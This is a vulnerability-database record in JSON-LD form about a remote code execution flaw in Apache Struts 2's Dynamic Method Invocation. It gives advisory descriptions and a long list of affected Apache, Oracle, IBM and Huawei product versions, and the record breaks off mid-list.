Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via the method: prefix, related to chained expressions. Apache Struts2 contains a vulnerability that allows execution of arbitrary code. Note that proof-of-concept code that uses this vulnerability has been released. The National Vulnerability Database (NVD) publishes it as CWE-77: Improper Neutralization of Special Elements used in a Command (Command Injection), http://cwe.mitre.org/data/definitions/77.html. A remote attacker could execute arbitrary code on the server where the product is running. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server 
Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201604-0434", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.2.3.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.1", }, { model: "struts", scope: "eq", trust: 
1.9, vendor: "apache", version: "2.3.14.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.2.3", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.1.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14.3", }, { model: "struts", scope: "eq", trust: 1.6, vendor: "apache", version: "2.2.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 1.4, vendor: "oracle", version: "10.0.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 1.4, vendor: "oracle", version: "10.8.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.12", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.10", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.11.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.20.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.20", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.1.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.2", }, { model: "struts", scope: "eq", trust: 1.3, 
vendor: "apache", version: "2.3.15", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.28", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.24", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.5", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.13", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.11", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.6", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.8.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.6", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.7", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.7", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.5", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.14", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.9", }, { model: "flexcube private 
banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "12.0.1", }, { model: "flexcube private banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "2.0.1", }, { model: "flexcube private banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "12.0.3", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.1.0", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.2.1.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.0.0", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.0.11.2", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.3", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.4.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.12", }, { model: "siebel e-billing", scope: "eq", trust: 1, vendor: "oracle", version: "7.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.24.1", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "struts", scope: "lte", trust: 0.8, vendor: "apache", version: "2.3.20 to 2.3.28 (except struts 2.3.20.3 and struts 2.3.24.3)", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.5.0", 
}, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.6.0", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.7.0", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.8.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "12.1.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "2.0.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "2.2.0", }, { model: "siebel", scope: "eq", trust: 0.8, vendor: "oracle", version: "of siebel apps - e-billing 7.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.6", }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "oceanstor n8500 v200r001c09spc506", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor onebox v100r003c10", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.5", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.20.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "agile controller-campus v100r002c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor 
v300r003c10spc100", scope: "ne", trust: 0.3, vendor: "huawei", version: "18800v3", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5600", }, { model: "oceanstor v100r001c01", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "oceanstor v300r003c10spc100", scope: "ne", trust: 0.3, vendor: "huawei", version: "18500v3", }, { model: "infosphere information governance catalog", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.3", }, { model: "oceanstor n8500 v200r001c91spc900", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "anyoffice v200r006c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5300", }, { model: "oceanstor v300r003c00", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor onebox v100r005c00", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5500", }, { model: "siebel apps e-billing", scope: "eq", trust: 0.3, vendor: "oracle", version: "-7.1", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5800", }, { model: "oceanstor", scope: "eq", trust: 0.3, vendor: "huawei", version: "5800v30", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "agile controller-campus v100r002c00spc107", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.3.41", }, { model: "logcenter v100r001c20spc102", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5800v3", }, { model: "flexcube 
private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "anyoffice emm v200r006c00spc101", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r001c20", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor v300r003c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "18500v3", }, { model: "oceanstor n8500 v200r001c09", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information governance catalog", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.5", }, { model: "oceanstor v300r005c00", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "firehunter6000 v100r001c20", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.7", }, { model: "oceanstor n8500 v200r001c91spc205", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "agile controller-campus v100r002c00spc106t", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor n8500 v200r001c91spc902", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.7", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "6800v3", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.1", }, { model: "oceanstor v300r003c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "18800", }, { model: "oceanstor n8500 v200r001c91spc901", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { 
model: "logcenter v100r001c20", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.24.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2.11", }, { model: "oceanstor v100r001c30", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.3", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "oceanstor v300r002c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor n8500 v200r001c91", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "anyoffice v200r005c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor n8500 v200r001c09spc505", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "firehunter6000 v100r001c20spc106t", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", 
}, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities 
framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 
0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: 
"retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation 
